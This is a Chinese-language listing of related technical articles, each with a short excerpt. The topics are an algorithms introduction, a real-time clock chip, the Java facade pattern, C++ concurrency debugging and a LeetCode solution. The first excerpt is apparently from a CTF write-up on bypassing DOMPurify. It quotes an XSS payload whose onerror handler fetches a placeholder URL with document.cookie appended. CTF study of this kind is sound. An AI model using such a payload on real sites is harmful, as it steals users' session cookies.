相关文章
ctf-web: xss 任意位置插入情况绕过 DOMPurify -- tpctf layout
参考
https://ouuan.moe/post/2025/03/tpctf-2025
baby layout
题目会将 {{cont}} 将被替换为有效负载,我们可以使用
<img src"{{content}}">" onerror"fetch({YOUR_URL}document.cookie)拼接后是这样的
<div><img src"" on…
建站知识
2025/3/20 19:47:10
【算法设计与分析】初识算法
1、为什么要学习算法?
程序设计能力是计算机专业学生的必备能力。
程序设计数据结构算法
数据结构:表达问题的数据在计算机中的存储形式.例如:队列、栈、二叉树。
算法:解决问题的程序化方案或计算步骤。
数据结构解决了信息…
建站知识
2025/4/2 17:46:55
芯谷D8563TS实时时钟/日历芯片详解可替代PCF8563
概述
芯谷D8563TS是一款低功耗CMOS实时时钟/日历芯片,广泛应用于移动电话、便携式仪器、传真机和电池供电产品等领域。该芯片通过两线双向IC总线进行数据传输,最大总线速度为400 kbits/s。D8563TS内置了自动递增的字地址寄存器,支持多种功能…
建站知识
2025/4/2 17:34:24
Java设计模式之外观模式(Facacde Pattern)
外观模式(Facade Pattern) 是一种 结构型设计模式,旨在为复杂的子系统提供一个统一的、简化的高层接口,使得客户端更容易使用子系统功能。它的核心思想是 隐藏系统复杂性,提供易用入口。
1. 核心角色
角色说明外观类…
建站知识
2025/4/2 17:50:59
多线程程序的测试和调试_第11章_《C++并发编程实战》笔记
多线程程序的测试和调试 1. 并发相关Bug的核心类型1.1 数据竞争(Data Race) 1.2 死锁(Deadlock)1.3 活锁(Livelock) 2. 定位并发Bug的技巧3. 代码优化与修复示例3.1 修复数据竞争(使用原子操作&…
建站知识
2025/4/2 17:30:36
LeetCode860☞柠檬水找零
关联LeetCode题号860
本题特点
贪心LeetCode169☞多数元素实现方式类似,相互抵消法
本题思路
贪心,优先使用最大的面值10找零钱,否则最后会因为10没有5找零10相比5来说,没有5那么通用
class Solution:def lemonadeChange(sel…
建站知识
2025/3/20 19:47:12